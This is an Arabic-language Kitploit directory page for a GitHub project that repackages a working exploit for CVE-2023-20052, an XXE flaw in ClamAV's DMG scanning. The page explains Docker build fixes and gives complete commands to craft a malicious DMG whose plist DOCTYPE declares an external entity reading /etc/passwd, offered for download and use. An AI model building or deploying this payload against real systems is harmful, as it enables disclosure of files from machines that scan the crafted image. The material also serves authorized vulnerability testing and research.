Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20052 | Kitploit
أدوات/GitHubGitHub/mohitsinghpapola/cve-2023-20052
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائيتحليل البرمجيات الخبيثةتحليل الملفات الثنائية
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2023-20052 - بناء مُصحّح

بناء Docker مُصحّح لـ CVE-2023-20052 (ثغرة XXE في ClamAV) يُجمَّع بنجاح فعليًا.

ما كان مكسورًا

الاستغلال الأصلي يفشل في البناء على الأنظمة الحديثة:

  • ❌ أخطاء توافق OpenSSL 3.0
  • ❌ أخطاء نوع غير مكتمل لهيكل HMAC_CTX
  • ❌ أخطاء الإعلان الضمني للدوال
  • ❌ فشل البناء عند ترجمة dmg/filevault.c

ما أصلحته

  1. تغيير الصورة الأساسية: من Ubuntu 22.04 إلى Ubuntu 18.04
  2. إصلاح إصدار OpenSSL: استخدام libssl1.0-dev (OpenSSL 1.0)
  3. إضافة الوضع غير التفاعلي: يمنع مطالبات البناء
  4. Dockerfile عامل: يُجمَّع بنجاح فعليًا

لماذا يعمل هذا

يستخدم libdmg-hfsplus دوال OpenSSL 1.0 المهجورة:

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (أُزيلت في OpenSSL 1.1+)
  • استخدام مباشر لهيكل HMAC_CTX (غير شفاف في OpenSSL 1.1+)

Ubuntu 18.04 هو آخر إصدار LTS يدعم OpenSSL 1.0.

البناء والاستخدام

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

الاعتمادات

  • الاستغلال الأصلي: nokn0wthing/CVE-2023-20052
  • أُصلح بواسطة: https://reapsec.com
root@kitploit:~
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
تنزيل الأداة